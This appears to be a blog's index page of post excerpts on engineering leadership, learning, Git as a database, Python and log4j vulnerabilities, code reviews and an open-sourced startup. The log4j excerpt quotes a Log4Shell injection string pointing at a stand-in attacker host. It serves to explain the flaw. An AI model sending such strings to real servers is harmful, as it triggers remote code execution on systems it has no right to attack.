Top insights from 150 engineering leaders: challenges, solutions, and learnings
Discover the top challenges faced by engineering leaders in small to big tech companies and learn effective strategies to overcome them.

What I learned about self-learning in 15 years
I love teaching myself new subjects. I have been doing it for the past 15 years, ever since I was 11. Having said that, I am a big believer in frameworks. Over the years, I have been working on a framework for learning a new subject: GAMP. Using this framework

You should not use Git as a database
My team inherited a system that stores its data on a file system, constantly being saved to Git, acting as a single source of truth. Is it better or worse than a database? The short answer is, of course, “it depends on your use case”.

How I found (and fixed) a vulnerability in Python
I focused my research on the most popular web frameworks, such as Flask, Bottle, and Tornado. Eventually, I found and fixed a vulnerability in Python.

We should be more prepared when the next Log4Shell arrives
Remember the Equifax breach that happened 4 years ago, caused by an Apache Struts vulnerability (CVE-2017-5638)? I argue that it's quite similar in nature to the new log4j vulnerability, and moreover - it will happen again, in a different project.

TL;DR: log4j vulnerability
log4j implements lookups with JNDI enabled by default: you could have written ${jndi:ldap://evil.com/} and gotten the server to look up that URL, then load and execute, using JNDI, the Java object that was returned.

No code reviews by default
Summary of Raycast's blog "No code reviews by default": At Raycast, we do not require code reviews. Engineers push to the main branch and request reviews when they think it's necessary.

My startup failed, so I open sourced the code
We worked on Dryvo for over a year. We put our hearts and souls into it - and we failed. Instead of letting the code rot in a private repository, we chose to make it public and hope someone finds it useful.